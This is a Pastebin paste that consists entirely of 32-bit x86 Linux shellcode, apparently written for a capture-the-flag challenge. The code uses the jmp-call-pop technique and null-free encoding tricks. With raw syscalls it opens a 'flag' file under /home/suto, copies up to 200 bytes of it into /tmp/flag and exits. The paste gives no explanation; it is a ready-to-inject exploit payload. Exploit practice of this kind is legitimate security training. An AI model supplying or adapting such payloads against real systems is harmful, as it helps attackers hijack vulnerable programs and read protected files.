Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- BITS 32
- jmp call
- back:
- pop ebx
- xor eax,eax
- mov [ebx+15],al
- mov al,5
- mov ecx,0x41414442
- shl ecx,20
- shr ecx,20
- mov dx, 744q
- int 0x80
- push eax
- add ebx,16
- xor eax,eax
- mov al,5
- int 0x80
- pop ebx
- push eax
- mov al,200
- sub esp,eax
- mov ecx,esp
- mov edx,eax
- xor eax,eax
- mov al,3
- int 0x80
- mov al,200
- add esp,eax
- pop ebx
- xor eax,eax
- mov al,4
- int 0x80
- xor eax,eax
- mov al,1
- int 0x80
- call:
- call back
- db "/home/suto/flagA"
- db "/tmp/flag"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement